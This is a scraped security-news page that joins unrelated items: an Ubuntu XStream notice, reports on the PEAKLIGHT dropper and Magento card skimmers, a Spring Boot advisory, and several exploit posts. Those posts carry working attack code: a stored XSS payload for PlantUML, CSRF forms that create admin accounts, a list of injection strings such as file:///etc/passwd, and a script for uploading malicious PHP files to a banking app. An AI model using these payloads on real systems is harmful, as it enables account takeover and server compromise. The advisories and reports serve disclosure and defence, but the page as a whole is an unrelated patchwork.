Ubuntu Security Notice 6978-1 - It was discovered that XStream incorrectly handled parsing of certain crafted XML documents. A remote attacker could possibly use this issue to read arbitrary files. Zhihong Tian and Hui Lu found that XStream was vulnerable to remote code execution. A remote attacker could run arbitrary shell commands by manipulating the processed input stream. It was discovered that XStream was vulnerable to server-side forgery attacks. A remote attacker could request data from internal resources that are not publicly available only by manipulating the processed input stream.

    ==========================================================================Ubuntu Security Notice USN-6978-1August 22, 2024libxstream-java vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in XStream.Software Description:- libxstream-java: Java library to serialize objects to XML and back againDetails:It was discovered that XStream incorrectly handled parsing of certaincrafted XML documents. A remote attacker could possibly use this issue toread arbitrary files. (CVE-2016-3674)Zhihong Tian and Hui Lu found that XStream was vulnerable to remote codeexecution. A remote attacker could run arbitrary shell commands bymanipulating the processed input stream. (CVE-2020-26217)It was discovered that XStream was vulnerable to server-side forgeryattacks. A remote attacker could request data from internal resourcesthat are not publicly available only by manipulating the processed inputstream. (CVE-2020-26258)It was discovered that XStream was vulnerable to arbitrary file deletionon the local host. A remote attacker could use this to delete arbitraryknown files on the host as long as the executing process had sufficientrights only by manipulating the processed input stream. (CVE-2020-26259)It was discovered that XStream was vulnerable to denial of service,arbitrary code execution, arbitrary file deletion and server-side forgeryattacks. A remote attacker could cause any of those issues bymanipulating the processed input stream. (CVE-2021-21341, CVE-2021-21342,CVE-2021-21343, CVE-2021-21344, CVE-2021-21345, CVE-2021-21346,CVE-2021-21347, CVE-2021-21348, CVE-2021-21349, CVE-2021-21350,CVE-2021-21351)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS   libxstream-java                 1.4.8-1ubuntu0.1+esm3                                   Available with Ubuntu ProUbuntu 14.04 LTS   libxstream-java                 1.4.7-1ubuntu0.1+esm2                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6978-1   CVE-2016-3674, CVE-2020-26217, CVE-2020-26258, CVE-2020-26259,   CVE-2021-21341, CVE-2021-21342, CVE-2021-21343, CVE-2021-21344,   CVE-2021-21345, CVE-2021-21346, CVE-2021-21347, CVE-2021-21348,   CVE-2021-21349, CVE-2021-21350, CVE-2021-21351

Ubuntu Security Notice USN-6978-1

Cybersecurity researchers have uncovered a never-before-seen dropper that serves as a conduit to launch next-stage malware with the ultimate goal of infecting Windows systems with information stealers and loaders.

"This memory-only dropper decrypts and executes a PowerShell-based downloader," Google-owned Mandiant said. "This PowerShell-based downloader is being tracked as PEAKLIGHT."

Some of

Malware / Threat Intelligence

Cybersecurity researchers have uncovered a never-before-seen dropper that serves as a conduit to launch next-stage malware with the ultimate goal of infecting Windows systems with information stealers and loaders.

"This memory-only dropper decrypts and executes a PowerShell-based downloader," Google-owned Mandiant said. "This PowerShell-based downloader is being tracked as PEAKLIGHT."

Some of the malware strains distributed using this technique are Lumma Stealer, Hijack Loader (aka DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, all of which are advertised under the malware-as-a-service (SaaS) model.

The starting point of the attack chain is a Windows shortcut (LNK) file that's downloaded via drive-by download techniques -- e.g., when users look up a movie on search engines. It's worth pointing out that the LNK files are distributed within ZIP archives that are disguised as pirated movies.

The LNK file connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. The dropper subsequently executes the PEAKLIGHT PowerShell downloader script on the host, which then reaches out to a command-and-control (C2) server to fetch additional payloads.

Mandiant said it identified different variations of the LNK files, some of which leverage asterisks (\*) as wildcards to launch the legitimate mshta.exe binary to discreetly run malicious code (i.e., the dropper) retrieved from a remote server.

In a similar vein, the droppers have been found to embed both hex-encoded and Base64-encoded PowerShell payloads that are eventually unpacked to execute PEAKLIGHT, which is designed to deliver next-stage malware on a compromised system while simultaneously downloading a legitimate movie trailer, likely as a ruse.

"PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths," Mandiant researchers Aaron Lee and Praveeth D'Souza said.

"If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk."

The disclosure comes as Malwarebytes detailed a malvertising campaign that employs fraudulent Google Search ads for Slack, an enterprise communications platform, to direct users to phony websites hosting malicious installers that culminate in the deployment of a remote access trojan named SectopRAT.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New PEAKLIGHT Dropper Deployed in Attacks Targeting Windows with Malicious Movie Downloads

PlantUML version 1.2024.6 suffers from a cross site scripting vulnerability.

    #Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)#Date: 23/08/2024#Exploit Author: Hosein Vita#Vendor Homepage: https://plantuml.com/#Version: 1.2024.6#Tested on: LinuxDescription:This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user's browser.Proof of Concept:plantumlCopy code@startumldigraph G {  graph [bgcolor="white"];  node [shape=box, style="rounded,filled", color="white"];  heading [fillcolor="white", label=<<table border="0" cellborder="0"><tr><td align="left">Error - Failed to load the content.<br/>Please click to reload..</td></tr></table>>, URL="javascript:alert(1);"];}@endumlAlternatively, you can reproduce the issue by appending the following string to https://<plantumlserver>/plantuml/svg/:Copy codePK-xJWGn3Epv2YiLI64FMcwJ3cWe41BLYiBP-3Ovh6JbDIyX_fr450XHUFoOiJoEUH5S4zp2vmd0Jps5PQvSnPctb9NCqxvHfKQ2QKkuaWlrtSAc7qpEI7qfaQ8zP6QAniB_rKGOSrbWwfe_j0N6GEp6KJ4mGQWIgR4N1cPY_ctzgD8Y0d9UYZDC1pN-MgGAdCCDvdORj09NR3bHSr6KYWvZa9s_PyAjpJZFprqbr7N3CEuq-WRIeHlmtiBZmvqpHtp5RPQywXKoYPvUdktxCr_VThis proof-of-concept remains stored and can be shared as a link with potential victims.

PlantUML 1.2024.6 Cross Site Scripting

CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

=============================================================================================================================================  
| # Title     : CMS RIMI v1.3 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://github.com/myroot593/RIMICMS                                                                                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Profile User Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  
          
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required>

          
        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required>

          
        <label for="confirm_password">Confirm Password:</label>  
        <input type="password" id="confirm_password" name="confirm_password" required>

          
        <label for="nama">Nama:</label>  
        <input type="text" id="nama" name="nama" required>

          
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required>

          
        <input type="hidden" name="id" value="">

          
        <button type="submit">Submit</button>  
    </form>  
</body>  
</html>

------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------

[+] Go to the line 3.

[+] Set the target site link Save changes and apply .

[+] Your file : 127.0.0.1/cmsrimi/content 

[+] save code as poc.html .

<p class="sukses-form"></p>  
<p class="error-form"></p>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">  
  <div class="form-group ">  
      <label>Judul :</label>  
      <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">  
      <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group ">  
    <label>Isi Berita :</label>  
    <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>  
    <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group">  
    <label>Kategori Berita :</label>  
    <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select>  <p class="error-form"></p>  
  </div>  
  <div class="form-group">  
    <label>Status:</label>  
    <select class="form-control" name="status_berita" id="status_berita">  
      <option value="Diterbitkan">Diterbitkan</option>  
      <option value="Draft">Draft</option>  
    </select>  
  </div>  
  <div class="form-group">  
      <label>Gambar Berita</label>  
      <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">  
      <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">  
  <p class="error-form"></p>  
  </div>  
  <button type="submit" class="btn btn-primary">Submit</button>  
</form>  
  <p class="error-form"></p>    
  <p class="error-form"></p>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

CMS RIMI 1.3 Cross Site Request Forgery / File Upload

Applications that use spring-boot-loader or spring-boot-loader-classic and contain custom code that performs signature verification of nested jar files may be vulnerable to signature forgery where content that appears to have been signed by one signer has, in fact, been signed by another.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-38807

**Signature forgery in Spring Boot's Loader**

Moderate severity GitHub Reviewed Published Aug 23, 2024 to the GitHub Advisory Database • Updated Aug 23, 2024

**Package**

maven org.springframework.boot:spring-boot-loader (Maven)

**Affected versions**

\>= 2.7.0, <= 2.7.21

\>= 3.0.0, <= 3.0.16

\>= 3.1.0, <= 3.1.12

\>= 3.2.0, <= 3.2.8

\>= 3.3.0, <= 3.3.2

**Patched versions**

2.7.22

3.0.17

3.1.13

3.2.9

3.3.3

maven org.springframework.boot:spring-boot-loader-classic (Maven)

\>= 2.7.0, <= 2.7.21

\>= 3.0.0, <= 3.0.16

\>= 3.1.0, <= 3.1.12

\>= 3.2.0, <= 3.2.8

\>= 3.3.0, <= 3.3.2

2.7.22

3.0.17

3.1.13

3.2.9

3.3.3

Published to the GitHub Advisory Database

Aug 23, 2024

Last updated

Aug 23, 2024

GHSA-7cj3-x93g-gj76: Signature forgery in Spring Boot's Loader

Whenever you shop online and enter your payment details, you could be at risk of being a victim of fraud. Digital...

Whenever you shop online and enter your payment details, you could be at risk of being a victim of fraud. Digital skimmers are snippets of code that have been injected into online stores and they can steal your credit card number, expiration date and CVV/CVC as you type it in.

We recently detected a new malware campaign targeting a number of online stores running Magento, a popular e-commerce platform. Due to the compromises looking similar, we believe the threat actors likely used the same vulnerability to plant their malicious code.

Within a few days, we identified over a dozen attacker-controlled websites set up to receive the stolen data. After adding those malicious sites to our security products, we were able to protect over 1.1K unique theft attempts from Malwarebytes users who happened to shop at one of a few hundred compromised stores.

**Technical details**

Each online store is injected with one seemingly harmless line of code, a simple script tag loading content from a remote website. Interestingly, across different hacked websites we noticed the same naming pattern:

{domain}.{shop|online)**/img/**

Below is an example of such an injection for the online store of a popular European beer manufacturer:

Here’s another example for a Canadian university, also compromised in a similar way. In the image, we can see the content of the remotely loaded JavaScript:

This loader contains a simple function that will retrieve information from the site it is being called from. For example, the website’s domain name is being passed as a parameter (‘s’) into another URL meant to retrieve the actual full skimmer code, which consists of a huge blob of obfuscated JavaScript:

During checkout, the payment flow is seamlessly altered such that a fake “Payment Method” frame is inserted within the store’s page. What’s interesting to note is that this particular store externalized their payment process to a company called Quickpay. However, the skimmer code takes precedent by being shown first to victims.

As you enter you credit card number, expiration data and CVC into the page, that data is being transmitted in real time and stored in a criminal’s database.

**Mitigations**

Digital skimmers are often impossible to recognize due to how they blend into a website. Unless you are inspecting network traffic or debugging the checkout page with Developer Tools, you simply can’t be sure that a store has not been compromised.

The critical moment happens when you need to enter your credit card number. This is when malicious code has the chance to grab that information directly from your browser.

In just a few days, our telemetry recorded 1,121 unique blocks from Malwarebytes users who had visited a compromised store. The chart below shows those blocks per malicious skimmer domain:

Malwarebytes antivirus and its browser extension (Browser Guard), both can detect and block the malicious infrastructure used by the criminals in this campaign. If you were to visit a compromised store, you would see a warning such as those below. Access to the store won’t be blocked, and while you could in theory shop safely (the skimmer code did not get a chance to be loaded), we’d still advise to refrain from making any purchases.

We contacted the stores featured in this blog post, and they have already taken action to either remove the malicious code or temporarily suspend their website. We did not reach out individually to each of the other compromised stores but we reported the malicious infrastructure to Cloudflare who already took action in flagging it as phishing.

Most credit card companies can quickly reissue a new card after it’s been stolen. However, we have seen skimmers that often collect more than just your financial data but also your email, home address and phone number, information typically required when buying anything online.

If you suspect that you recently made a purchase that resulted in your credit card company alerting you, check out our Identity Protection included in Malwarebytes Premium Security.

**Indicators of Compromise**

Malicious domains used by the skimmer:

codcraft\[.\]shop  
codemingle\[.\]shop  
datawiz\[.\]shop  
deslgnpro\[.\]shop  
happywave\[.\]shop  
luckipath\[.\]shop  
pixelsmith\[.\]shop  
salesguru\[.\]online  
statlstic\[.\]shop  
statmaster\[.\]shop  
trendset\[.\]website  
vodog\[.\]shop  
artvislon\[.\]shop  
statistall\[.\]com  
analytlx\[.\]shop

 Hundreds of online stores hacked in new campaign 

Online Survey System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online Survey System 1.0 CSRF Vulnerability                                                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/survey/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Survey System 1.0 Cross Site Request Forgery

Online Shopping System Master version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : online shopping system master v1.0 CSRF Vulnerability                                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Online_Shopping_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/adduser.php.

[+] save code as poc.html .

<div class="card">  
                <div class="card-header card-header-primary">  
                  <h4 class="card-title">Add Users</h4>  
                  <p class="card-category">Complete User profile</p>  
                </div>  
                <div class="card-body">  
                  <form action="http://127.0.0.1/online-shopping-system-master/admin/adduser.php" method="post" name="form" enctype="multipart/form-data">  
                    <div class="row">

                            </div>  
                      </div>  
                    </div>  
                    <div class="row">  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Email</label>  
                          <input type="email" name="email" id="email" class="form-control" required="">  
                        </div>  
                      </div>  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Password</label>  
                          <input type="password" id="password" name="password" class="form-control" required="">  
                        </div>  
                      </div>

                                        <button type="submit" name="btn_save" id="btn_save" class="btn btn-primary pull-right">Update User</button>  
                    <div class="clearfix"></div>  
                  </form>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Shopping System Master 1.0 Cross Site Request Forgery

Online Banking System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Banking System 1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip                                           |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload PHP malicious files directly.

    [+] Here’s a breakdown of its components and functionality:

    HTML Structure:  
        DOCTYPE & <html>: Defines the document type and language.  
        <head>: Contains meta-information about the document like character encoding and viewport settings, and the title of the page.  
        <body>: Contains the main content of the page.

    Form Elements:  
        <form id="uploadForm">: A form with the ID "uploadForm" that contains input fields and a button for file upload.  
        <label> and <input> fields: Collect information from the user:  
            Target IP: IP address where the file will be uploaded.  
            Attacker IP: The IP address of the attacker (though this field is not used in the script).  
            Attacker Port: The port number of the attacker (not used in the script).  
            File Input: Allows the user to select a file to upload.  
        <button>: A button that triggers the file upload process when clicked.

    JavaScript Functionality:  
        uploadFile(): Function executed when the "Upload File" button is clicked.  
            Collects input values: Retrieves values from the input fields and the selected file.  
            Validation: Checks if all fields are filled and a file is selected. Alerts the user if any field is missing.  
            FormData Object: Creates a FormData object to package the file and additional data (name with the value 'PWNED').  
            fetch API: Sends a POST request to the target IP with the file attached:  
                URL: http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings  
                Response Handling: Logs success or failure based on the server's response. If the response is '1', it indicates success; otherwise, it logs an error.

    Security Note:  
        Potential Risk: This script is for educational purposes, and its functionality (uploading a file to a specified server) could be misused.   
    It’s crucial to ensure that any file upload functionality is properly secured and validated to prevent unauthorized access or attacks.

[+] Line 45 set url of target.

[+] Choose the target IP .

[+] Put any IP address of your own .

[+] Put any port .

[+] The path to upload the files : http://localhost/banking/uploads/

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Direct File Upload</title>  
</head>  
<body>

    <h2>Direct File Upload</h2>  
    <form id="uploadForm">  
        <label for="targetIP">Target IP:</label>  
        <input type="text" id="targetIP" name="targetIP" required><br><br>

        <label for="attackerIP">Attacker IP:</label>  
        <input type="text" id="attackerIP" name="attackerIP" required><br><br>

        <label for="attackerPort">Attacker Port:</label>  
        <input type="number" id="attackerPort" name="attackerPort" required><br><br>

        <label for="fileInput">Select File:</label>  
        <input type="file" id="fileInput" name="fileInput" required><br><br>

        <button type="button" onclick="uploadFile()">Upload File</button>  
    </form>

    <script>  
        function uploadFile() {  
            const targetIP = document.getElementById('targetIP').value;  
            const attackerIP = document.getElementById('attackerIP').value;  
            const attackerPort = document.getElementById('attackerPort').value;  
            const fileInput = document.getElementById('fileInput').files[0];

            if (!targetIP || !attackerIP || !attackerPort || !fileInput) {  
                alert('Please fill in all fields and select a file.');  
                return;  
            }

            const formData = new FormData();  
            formData.append('name', 'PWNED');  
            formData.append('img', fileInput);

            console.log("(+) Uploading file...");

            fetch(`http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings`, {  
                method: 'POST',  
                body: formData  
            })  
            .then(response => response.text())  
            .then(data => {  
                if (data === '1') {  
                    console.log("(+) File upload seems to have been successful!");  
                } else {  
                    console.log("(-) Oh no, the file upload seems to have failed!");  
                }  
            })  
            .catch(error => console.error("(-) Error during file upload:", error));  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Banking System 1.0 Arbitrary File Upload

Online ID Generator version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online ID Generator 1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

    FormData Object:

          The FormData object is created to hold the form's data, including the file upload.

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <label for="img">Avatar:</label>  
        <input type="file" id="img" name="img" accept="image/*"><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/id_generator/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Tag

#java